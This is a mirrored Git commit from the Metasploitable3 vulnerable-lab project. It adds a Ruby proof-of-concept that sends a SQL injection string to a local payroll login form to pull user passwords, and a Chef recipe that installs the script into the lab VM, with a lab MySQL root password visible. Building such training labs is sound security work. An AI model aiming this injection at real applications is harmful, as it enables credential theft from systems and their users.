mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-06-30 16:55:50 +02:00
Add poc for sql injection.
This commit is contained in:
parent
dc8ffbcec6
commit
bc8fb88017
|
@ -38,6 +38,7 @@ if($_POST['s']){
|
||||||
foreach ($keys as $key) {
|
foreach ($keys as $key) {
|
||||||
echo "<td>" . $row[$key] . "</td>";
|
echo "<td>" . $row[$key] . "</td>";
|
||||||
}
|
}
|
||||||
|
echo "</tr>\n";
|
||||||
}
|
}
|
||||||
$result->free();
|
$result->free();
|
||||||
}
|
}
|
||||||
|
|
14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb
Normal file
14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb
Normal file
|
@ -0,0 +1,14 @@
|
||||||
|
require 'net/http'
|
||||||
|
|
||||||
|
url = "http://127.0.0.1/payroll_app.php"
|
||||||
|
uri = URI(url)
|
||||||
|
user = 'luke_skywalker'
|
||||||
|
injection = "password'; select password from users where username='' OR ''='"
|
||||||
|
|
||||||
|
puts "Making POST request to #{uri} with the following parameters:"
|
||||||
|
puts "'user' = #{user}"
|
||||||
|
puts "'password' = #{injection}"
|
||||||
|
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
|
||||||
|
|
||||||
|
puts "Response body is #{res.body}"
|
||||||
|
puts "Done"
|
|
@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
|
||||||
mode '0755'
|
mode '0755'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
directory '/home/vagrant/poc/payroll_app/' do
|
||||||
|
mode '0755'
|
||||||
|
owner 'vagrant'
|
||||||
|
recursive true
|
||||||
|
end
|
||||||
|
|
||||||
|
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||||
|
source 'payroll_app/poc.rb'
|
||||||
|
mode '0755'
|
||||||
|
end
|
||||||
|
|
||||||
bash 'create payroll database and import data' do
|
bash 'create payroll database and import data' do
|
||||||
code <<-EOH
|
code <<-EOH
|
||||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
||||||
|
|
Loading…
Reference in New Issue
Block a user